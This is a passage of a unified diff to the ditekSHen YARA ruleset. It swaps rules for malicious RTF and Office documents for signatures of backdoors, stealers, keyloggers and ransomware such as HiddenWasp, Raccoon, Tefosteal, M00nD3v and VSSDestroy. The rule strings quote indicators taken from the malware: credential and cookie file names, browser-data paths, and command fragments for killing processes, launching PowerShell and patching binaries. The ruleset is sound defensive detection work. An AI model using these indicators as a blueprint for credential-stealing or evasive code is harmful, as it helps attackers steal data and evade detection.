 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d6c62957ce40ed755a84bd9aa8900e4990c466097d6df55c539b289bf50fe94e"
+		logic_hash = "e64383304bc913b07a2e63d61c81354b996c01171357005f4a28957d4d889599"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		snort2_sid = "910006-910007"
-		snort3_sid = "910003"
-		clamav_sig = "INDICATOR.RTF.EquationCertUtilDownloader"
+		clamav_sig1 = "MALWARE_Linux.Backdoor.Exaramel"
+		clamav_sig2 = "MALWARE_Win.Backdoor.Exaramel"
 
 	strings:
-		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
-		$cu = "636572747574696c" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
+		$s1 = "vendor/golang_org/x/crypto/" ascii
+		$s2 = "vendor/golang_org/x/net/http2" ascii
+		$s3 = "vendor/golang_org/x/text/unicode" ascii
+		$s4 = "vendor/golang_org/x/text/transform" ascii
+		$s5 = "config.json" ascii
+		$cmd1 = "App.Update" ascii
+		$cmd2 = "App.Delete" ascii
+		$cmd3 = "App.SetProxy" ascii
+		$cmd4 = "App.SetServer" ascii
+		$cmd5 = "App.SetTimeout" ascii
+		$cmd6 = "IO.WriteFile" ascii
+		$cmd7 = "IO.ReadFile" ascii
+		$cmd8 = "OS.ShellExecute" ascii
+		$cmd9 = "awk 'match($0, /(upstart|systemd|sysvinit)/){ print substr($0, RSTART, RLENGTH);exit;" ascii
+		$ws1 = "/commands/@slp" wide
+		$ws2 = "/commands/cmd" wide
+		$ws3 = "/settings/proxy/@password" wide
+		$ws4 = "/settings/servers/server[@current='true']" wide
+		$ws5 = "/settings/servers/server/@current[text()='true']" wide
+		$ws6 = "/settings/servers/server[text()='%s']/@current" wide
+		$ws7 = "/settings/servers/server[%d]" wide
+		$ws8 = "/settings/storage" wide
+		$ws9 = "/settings/check" wide
+		$ws10 = "/settings/interval" wide
+		$ws11 = "report.txt" wide
+		$ws12 = "stg%02d.cab" ascii
+		$ws13 = "urlmon.dll" ascii
+		$ws14 = "ReportDir" ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( ( $eq and $cu ) and 1 of ( $obj* ) )
+		( uint16( 0 ) == 0x457f and ( all of ( $s* ) and 6 of ( $cmd* ) ) ) or ( uint16( 0 ) == 0x5a4d and 12 of ( $ws* ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_Equation_Powershell_Downloader : FILE
+rule DITEKSHEN_MALWARE_Linux_Hiddenwasp : FILE
 {
 	meta:
-		description = "Detects RTF documents that references both Microsoft Equation Editor and PowerShell. Common exploit + dropper behavior."
+		description = "HiddenWasp backdoor payload"
 		author = "ditekSHen"
-		id = "5d1d65ef-e183-5a0d-a0fa-d0d5f09f21a1"
+		id = "220e5e6e-7c5c-5f70-b3eb-50d9c5ec636d"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L478-L501"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L461-L486"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b8b9b7b40f8b4d659de9e025a65d5c6b64c6066bb618a3e7ed3c318f70befe5"
+		logic_hash = "a2aad022de41ba2633fc92a7dc5a5fa2efde9da2211cfc01fb2999e33365d6c9"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		snort2_sid = "910004-910005"
-		snort3_sid = "910002"
-		clamav_sig = "INDICATOR.RTF.EquationPowerShellDownloader"
+		clamav_sig1 = "MALWARE_Linux.Trojan.HiddenWasp-ELF"
+		clamav_sig2 = "MALWARE_Linux.Trojan.HiddenWasp-Script"
 
 	strings:
-		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
-		$ps = "706f7765727368656c6c" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
+		$x1 = "I_AM_HIDDEN" fullword ascii
+		$x2 = "HIDE_THIS_SHELL" fullword ascii
+		$x3 = "NewUploadFile" ascii
+		$x4 = "fake_processname" ascii
+		$x5 = "swapPayload" ascii
+		$x6 = /Trojan-(Platform|Machine|Hostname|OSersion)/ fullword ascii
+		$s1 = "FileOpration::GetFileData" fullword ascii
+		$s2 = "FileOpration::NewUploadFile" fullword ascii
+		$s3 = "Connection::writeBlock" fullword ascii
+		$s4 = /hiding_(hidefile|enable_logging|hideproc|makeroot)/ fullword ascii
+		$s5 = "Reverse-Port" fullword ascii
+		$s6 = "hidden_services" fullword ascii
+		$s7 = "check_config" fullword ascii
+		$s8 = "__data_start" fullword ascii
+		$s9 = /patch_(suger_lib|ld|lib)/ fullword ascii
+		$s10 = "hexdump -ve '1/1 \"%%.2X\"' %s | sed \"s/%s/%s/g\" | xxd -r -p > %s.tmp"
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( ( $ps and $eq ) and 1 of ( $obj* ) )
+		uint16( 0 ) == 0x457f and ( 4 of ( $x* ) or all of ( $s* ) or ( 3 of ( $x* ) and 5 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_LNK_Shell_Explorer_Execution : FILE
+rule DITEKSHEN_MALWARE_Multi_Wellmess : FILE
 {
 	meta:
-		description = "detects RTF files with Shell.Explorer.1 OLE objects with embedded LNK files referencing an executable."
+		description = "WellMess Windows/Linux backdoor payload"
 		author = "ditekSHen"
-		id = "2cac4dd8-086a-5220-a658-94cedd9cf7c3"
+		id = "cfa0f077-9d45-5796-b888-66fb397e74f8"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L503-L517"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L488-L510"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c11a37425e260692e11dc8fca317611106245d1590081a7038036ad568702f8"
+		logic_hash = "9cbbca609fd289d7406d9073237688d250dc68c450676b9b755509540d8f76a5"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig1 = "MALWARE_Win.Trojan.WellMess_DotNet"
+		clamav_sig2 = "MALWARE_Win.Trojan.WellMess_Golang"
+		clamav_sig3 = "MALWARE_Linux.Trojan.WellMess_Golang"
 
 	strings:
-		$clsid = "c32ab2eac130cf11a7eb0000c05bae0b" ascii nocase
-		$lnk_header = "4c00000001140200" ascii nocase
-		$http_url = "6800740074007000" ascii nocase
-		$file_url = "660069006c0065003a" ascii nocase
+		$s1 = "-----BEGIN PUBLIC KEY-----" ascii
+		$s2 = "-----END PUBLIC KEY-----" ascii
+		$s3 = "net/http.(*persistConn).readResponse" ascii
+		$s4 = "net/http/cookiejar.(*Jar).SetCookies" ascii
+		$s5 = "_/home/ubuntu/GoProject/src/bot/botlib" ascii
+		$s6 = "<;head;><;title;>" ascii
+		$s7 = "<;title;><;service;>" ascii
+		$s8 = "http://invalidlookup" ascii
+		$s9 = "<autogenerated>" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and filesize < 1500KB and $clsid and $lnk_header and ( $http_url or $file_url )
+		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and all of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Forms_HTML_Execution : FILE
+rule DITEKSHEN_MALWARE_Win_Konni : FILE
 {
 	meta:
-		description = "detects RTF files with Forms.HTML:Image.1 or Forms.HTML:Submitbutton.1 OLE objects referencing file or HTTP URLs."
+		description = "Konni payload"
 		author = "ditekSHen"
-		id = "26b21c94-9192-53be-808b-b553f87769e1"
+		id = "86eae9f6-60b0-5720-8528-ddbe32b6d4a6"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L519-L533"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L512-L530"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e8a2072971c40d6fbc0e0265a9adfbe4faa04d0f3c6962fda443da33aa06906"
+		logic_hash = "d57c51f7ede28b74395e5e0fbcc5fd9247b3353330f3e549d5abf99bbd7a1b93"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$img_clsid = "12d11255c65ccf118d6700aa00bdce1d" ascii nocase
-		$sub_clsid = "10d11255c65ccf118d6700aa00bdce1d" ascii nocase
-		$http_url = "6800740074007000" ascii nocase
-		$file_url = "660069006c0065003a" ascii nocase
+		$s1 = "uplog.tmp" fullword wide
+		$s2 = "upfile.tmp" fullword wide
+		$s3 = "%s-log-%s" fullword ascii wide
+		$s4 = "%s-down" ascii wide
+		$s5 = "%s-file-%s" fullword ascii wide
+		$s6 = "\"rundll32.exe\" \"%s\" install" fullword wide
+		$s7 = "subject=%s&data=" fullword ascii
+		$s8 = "dll-x64.dll" fullword ascii
+		$s9 = "dll-x32.dll" fullword ascii
+		$pdb1 = "\\virus-dropper\\Release\\virus-dropper.pdb" ascii
+		$pdb2 = "\\virus-init\\Release\\virus-init.pdb" ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $pdb* ) ) )
+}
+rule DITEKSHEN_MALWARE_Win_Bitterrat : FILE
+{
+	meta:
+		description = "BitterRAT payload"
+		author = "ditekSHen"
+		id = "cccb2102-b78a-59ce-98e6-c702c4bec4d4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L532-L551"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "f9dec388af6ddc767f82d7de7ba47754e76058022e6e55bbafd846ca8655a03b"
+		score = 75
+		quality = 50
+		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.BitterRAT"
+
+	strings:
+		$s1 = "getfile" fullword wide
+		$s2 = "getfolder" fullword wide
+		$s3 = "winmgmts://./root/default:StdRegProv" fullword wide
+		$s4 = "winlog" fullword wide
+		$s5 = "winprt" fullword wide
+		$s6 = "c:\\intel\\" fullword ascii
+		$s7 = "AXE: #" fullword ascii
+		$s8 = "Bld: %s.%s.%s" fullword ascii
+		$s9 = "53656C656374202A2066726F6D2057696E33325F436F6D707574657253797374656D" wide nocase
+		$pdb1 = "\\28NovDwn\\Release\\28NovDwn.pdb" ascii
+		$pdb2 = "\\Shellcode\\Release\\Shellcode.pdb" ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and filesize < 1500KB and ( $img_clsid or $sub_clsid ) and ( $http_url or $file_url )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $* ) or ( 4 of ( $s* ) and 1 of ( $pdb* ) ) )
 }
-rule DITEKSHEN_INDICATOR_PUB_MSIEXEC_Remote : FILE
+rule DITEKSHEN_MALWARE_Win_Tjkeylogger : FILE
 {
 	meta:
-		description = "detects VB-enable Microsoft Publisher files utilizing Microsoft Installer to retrieve remote files and execute them"
+		description = "TJKeylogger payload"
 		author = "ditekSHen"
-		id = "518db2bb-174b-54c4-b330-1e8a8e36265d"
+		id = "6aaa11b2-3734-5538-b593-f5276f3acc72"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L535-L549"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L553-L567"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be5407e6e6e21e77f6de1d3a378996bfc6ce4326986aa03eb152e772bb495184"
+		logic_hash = "52d98a6f5a2cfc6717b7097b4e70c1e813851222f9f06ae74be4e5703b0b0dde"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Microsoft Publisher" ascii
-		$s2 = "msiexec.exe" ascii
-		$s3 = "Document_Open" ascii
-		$s4 = "/norestart" ascii
-		$s5 = "/i http" ascii
-		$s6 = "Wscript.Shell" fullword ascii
-		$s7 = "\\VBE6.DLL#" wide
+		$s1 = "TJKeyLogger" fullword ascii
+		$s2 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii
+		$s3 = "\\Passwords.txt" ascii
+		$s4 = "TJKeyLogItem" fullword ascii
+		$s5 = "TJKeyAsyncLog" fullword ascii
+		$s6 = "FM_GETDSKLST" fullword ascii
+		$s7 = "KL_GETMODE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and 6 of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Ancalog_Exploit_Builder_Document : FILE
+rule DITEKSHEN_MALWARE_Win_W1RAT : FILE
 {
 	meta:
-		description = "Detects documents generated by Phantom Crypter/Ancalog"
+		description = "W1 RAT payload"
 		author = "ditekSHen"
-		id = "01e7f949-8ced-5355-978c-34d6e639e61a"
+		id = "d5841bc0-97e7-575e-91f6-d264f507a8b5"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L551-L563"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L569-L585"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e458be78ca8975d067110dc38119437b3ffe55afdbfdab47468c9ed74bba9f9d"
+		logic_hash = "84b9a2e309ed9ab0fb8343d941585356d23348683073d0a37fc7194f58a43a0e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "910000-910001"
-		snort3_sid = "910000"
-		clamav_sig = "INDICATOR.RTF.AncalogExploitBuilderDocument"
 
 	strings:
-		$builder1 = "{\\*\\ancalog" ascii
-		$builder2 = "\\ancalog" ascii
+		$s1 = "/c /Ox /Fa\"%s/%s.asm\" /Fo\"%s/%s.obj\" \"%s/%s.%s\"" ascii
+		$s2 = "this->piProcInfo.hProcess" fullword ascii
+		$s3 = "index >= 0 && index < this->reg_tab->GetLen()" fullword ascii
+		$s4 = "strcpy(log_font.lfFaceName,\"%s\");" fullword ascii
+		$s5 = "WorkShop -- [%s]" fullword ascii
+		$s6 = "HeaderFile.cpp" fullword ascii
+		$s7 = "WndLog.cpp" fullword ascii
+		$s8 = "assertion fail \"%s\" at file=%s line=%d" fullword ascii
+		$s9 = "Stdin   pipe   creation   failed" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $builder* )
+		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( all of them )
 }
-rule DITEKSHEN_INDICATOR_RTF_Threadkit_Exploit_Builder_Document : FILE
+rule DITEKSHEN_MALWARE_Win_Raccoon : FILE
 {
 	meta:
-		description = "Detects vaiations of RTF documents generated by ThreadKit builder."
+		description = "Raccoon stealer payload"
 		author = "ditekSHen"
-		id = "f4a4e7f0-ea2f-523f-9634-a939dc90706e"
+		id = "5ebef663-623c-592e-b69a-f620492f0cc1"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L565-L582"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L587-L606"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f2308ac6ae5345e0c783871dd6b471397ec83ba7194db5cc74c8984d84c2c0c2"
+		logic_hash = "258481982d20d229506f442a5a205fdc05f6ac4399f3a0665860e6529c30943b"
 		score = 75
 		quality = 50
 		tags = "FILE"
 
 	strings:
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
-		$pat1 = /\\objupdate\\v[\\\s\n\r]/ ascii
+		$s1 = "inetcomm server passwords" fullword wide
+		$s2 = "content-disposition: form-data; name=\"file\"; filename=\"data.zip\"" fullword ascii
+		$s3 = ".?AVfilesystem_error@v1@filesystem@experimental@std@@" fullword ascii
+		$s4 = "CredEnumerateW" fullword ascii
+		$s5 = "%[^:]://%[^/]%[^" fullword ascii
+		$s6 = "%99[^:]://%99[^/]%99[^" fullword ascii
+		$s7 = "Login Data" wide
+		$s8 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide
+		$x1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide
+		$x2 = "\\json.hpp" wide
+		$x3 = "Microsoft_WinInet_" fullword wide
+		$x4 = "Microsoft_WinInet_*" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 2 of ( $obj* ) and 1 of ( $pat* )
+		uint16( 0 ) == 0x5a4d and ( ( 3 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $x* ) ) )
 }
-rule DITEKSHEN_INDICATOR_XML_Legacydrawing_Autoload_Document : FILE
+rule DITEKSHEN_MALWARE_Win_Tefosteal : FILE
 {
 	meta:
-		description = "detects AutoLoad documents using LegacyDrawing"
+		description = "Tefosteal payload"
 		author = "ditekSHen"
-		id = "ce116601-7048-5a3f-9b73-5127ca3b359e"
+		id = "56646933-3ed3-5b77-9135-993b57603490"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L584-L594"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L653-L674"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a038636f5e8e7837c2209072f1659b921c8a9a48d4ed153e735915cf1f7f3fcc"
+		logic_hash = "a350863270cbe3349f271e55d66a2ebdd6406e8d122c11071de74a774eb77ebf"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Tefosteal"
 
 	strings:
-		$s1 = "<legacyDrawing r:id=\"" ascii
-		$s2 = "<oleObject progId=\"" ascii
-		$s3 = "autoLoad=\"true\"" ascii
+		$s1 = "netsh wlan show networks mode=bssid" nocase fullword wide
+		$s2 = "LoginCredentialService.GetLoginCredentials$" ascii
+		$s3 = "DefaultLoginCredentials.LoginEventUsrPw$" ascii
+		$s4 = "SEC_E_NO_KERB_KEY" wide
+		$s5 = "TList<System.Zip.TZipHeader>." ascii
+		$s6 = "_Password.txt" fullword wide nocase
+		$s7 = "_Cookies.txt" fullword wide nocase
+		$f1 = "\\InfoPC\\BSSID.txt" wide
+		$f2 = "\\Files\\Telegram\\" wide
+		$f3 = "\\InfoPC\\Screenshot.png" wide
+		$f4 = "\\InfoPC\\Systeminfo.txt" wide
+		$f5 = "\\Steam\\config" wide
+		$f6 = "\\delete.vbs" wide
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) and 2 of ( $f* )
 }
-rule DITEKSHEN_INDICATOR_XML_OLE_Autoload_Document : FILE
+rule DITEKSHEN_MALWARE_Win_Cryptostealergo : FILE
 {
 	meta:
-		description = "detects AutoLoad documents using OLE Object"
+		description = "CryptoStealerGo payload"
 		author = "ditekSHen"
-		id = "b3d682c3-641a-554a-8607-e99d07e9a57d"
+		id = "83886aeb-af7e-564c-989a-fb7d955814e2"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L596-L606"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L676-L692"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b262a9f8e82dea55afc26acac731827b64f52069a2bf314f716832b3dfc2c04f"
+		logic_hash = "0050be7522e7d89cb9688e63fdca11d24baa74aa858e8c19ee7b4658518536b6"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "autoLoad=\"true\"" ascii
-		$s2 = "/relationships/oleObject\"" ascii
-		$s3 = "Target=\"../embeddings/oleObject" ascii
+		$s1 = "Go build ID: \"" ascii
+		$s2 = "file_upload.go" ascii
+		$s3 = "grequests.FileUpload" ascii
+		$s4 = "runtime.newproc" ascii
+		$s5 = "credit_cards" ascii
+		$s6 = "zip.(*fileWriter).Write" ascii
+		$s7 = "autofill_" ascii
+		$s8 = "XFxVc2VyIERhdGFcXA==" ascii
+		$s9 = "XFxBcHBEYXRhXFxMb2NhbFxc" ascii
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-rule DITEKSHEN_INDICATOR_XML_Squiblydoo_1 : FILE
+rule DITEKSHEN_MALWARE_Win_M00Nd3V : FILE
 {
 	meta:
-		description = "detects Squiblydoo variants extracted from exploit RTF documents."
+		description = "M00nD3v keylogger payload"
 		author = "ditekSHen"
-		id = "cac326ab-cc31-59c1-bd12-285db1675695"
+		id = "4000f55d-e072-50b6-b6ee-72cefc0ec53f"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L608-L622"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L694-L715"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b52ebd76dd4e60f6bd5cb19fed3a72b6aeb90dea95f0d1be61dcfff39ea674ae"
+		logic_hash = "68a0888da3b114dc895fe18a3d03b2b88d140fbf82b888f7a031b9364d01aabf"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$slt = "<scriptlet" ascii
-		$ws1 = "CreateObject(\"WScript\" & \".Shell\")" ascii
-		$ws2 = "CreateObject(\"WScript.Shell\")" ascii
-		$ws3 = "ActivexObject(\"WScript.Shell\")" ascii
-		$r1 = "[\"run\"]" nocase ascii
-		$r2 = ".run \"cmd" nocase ascii
-		$r3 = ".run chr(" nocase ascii
+		$s1 = "M00nD3v Stub" ascii wide
+		$s2 = "M00nD3v{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" fullword wide
+		$s3 = "Anti-Keylogger Elite" wide
+		$s4 = "/C TASKKILL /F /IM" wide
+		$s5 = "echo.>{0}:Zone.Identifier" fullword wide
+		$s6 = "> Nul & Del \"{0}\" & start \"\" \"{1}.exe\"" wide
+		$s7 = "> Nul & start \"\" \"{1}.exe\"" wide
+		$s8 = "Stealer" fullword wide
+		$s9 = "{0}{0}++++++++++++{1} {2}++++++++++++{0}{0}" wide
+		$s10 = "{4}Application: {3}{4}URL: {0}{4}Username: {1}{4}Password: {2}{4}" wide
+		$s11 = "encrypted_key\":\"(?<Key>.+?)\"" wide
+		$s12 = "Botkiller" fullword ascii
+		$s13 = "AVKiller" fullword ascii
+		$s14 = "get_pnlPawns" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x4d583f3c or uint32( 0 ) == 0x6d783f3c ) and $slt and 1 of ( $ws* ) and 1 of ( $r* )
+		( uint16( 0 ) == 0x5a4d and 6 of them ) or ( 9 of them )
 }
-rule DITEKSHEN_INDICATOR_OLE_Suspicious_Reverse : FILE
+rule DITEKSHEN_MALWARE_Win_Vssdestroy : FILE
 {
 	meta:
-		description = "detects OLE documents containing VB scripts with reversed suspicious strings"
+		description = "VSSDestroy/Matrix ransomware payload"
 		author = "ditekSHen"
-		id = "a7f4d18d-add6-5df2-9a8c-f88d8e3766da"
+		id = "734ece56-b993-5b44-ae15-f673fabfe8ad"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L624-L644"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L717-L740"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "04950549eede23b7006103539f20437713a54138c073d9805048392ea0a3df2a"
-		score = 65
-		quality = 71
+		logic_hash = "24bfd32580f784440252d629a7ab86b84a570ded34409940616be2a89bf73088"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		snort_sid = "920008-920009"
+		clamav_sig = "MALWARE.Win.Ransomware.VSSDestroy"
 
 	strings:
-		$vb = "\\VBE7.DLL" ascii
-		$cmd1 = "CMD C:\\" nocase ascii
-		$cmd2 = "CMD /c " nocase ascii
-		$kw1 = "]rAHC[" nocase ascii
-		$kw2 = "ekOVNI" nocase ascii
-		$kw3 = "EcaLPEr" nocase ascii
-		$kw4 = "TcEJBO-WEn" nocase ascii
-		$kw5 = "eLbAirav-Teg" nocase ascii
-		$kw6 = "ReveRSE(" nocase ascii
-		$kw7 = "-JOIn" nocase ascii
+		$o1 = "[SHARESSCAN]" wide
+		$o2 = "[LDRIVESSCAN]" wide
+		$o3 = "[LOGSAVED]" wide
+		$o4 = "[LPROGRESS]" wide
+		$o5 = "[FINISHSAVED]" wide
+		$o6 = "[ALL_LOCAL_KID]" wide
+		$o7 = "[DIRSCAN" wide
+		$o8 = "[GENKEY]" wide
+		$s1 = "\\cmd.exe" nocase wide
+		$s2 = "/C powershell \"" nocase wide
+		$s3 = "%COMPUTERNAME%" wide
+		$s4 = "%USERNAME%" wide
+		$s5 = "Error loading Socket interface (ws2_32.dll)!" wide
+		$s6 = "Old file list dump found. Want to load it? (y/n):" fullword wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and $vb and ( ( 1 of ( $cmd* ) and 1 of ( $kw* ) ) or ( 2 of ( $kw* ) ) )
+		( uint16( 0 ) == 0x5a4d and 4 of ( $o* ) and 3 of ( $s* ) ) or ( 5 of ( $o* ) and 4 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Suspicious_Activex : FILE
+rule DITEKSHEN_MALWARE_Win_Goldenaxe : FILE
 {
 	meta:
-		description = "detects OLE documents with suspicious ActiveX content"
+		description = "GoldenAxe ransomware payload"
 		author = "ditekSHen"
-		id = "e4a74955-8519-561d-bb23-6469e7ae5aaa"
+		id = "23874106-dbbb-5cb2-b61a-1661d8e2d868"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L646-L676"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L742-L763"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d9a672b0eeccd93b4ae98fef45560490171f8fc16b712d1e0141fc0ef1d0e342"
-		score = 65
-		quality = 73
+		logic_hash = "6dfd88ce65acdfed4749e3b817b317c3c514ea42f892a7f5f95853c148507918"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.GoldenAxe"
 
 	strings:
-		$vb = "\\VBE7.DLL" ascii
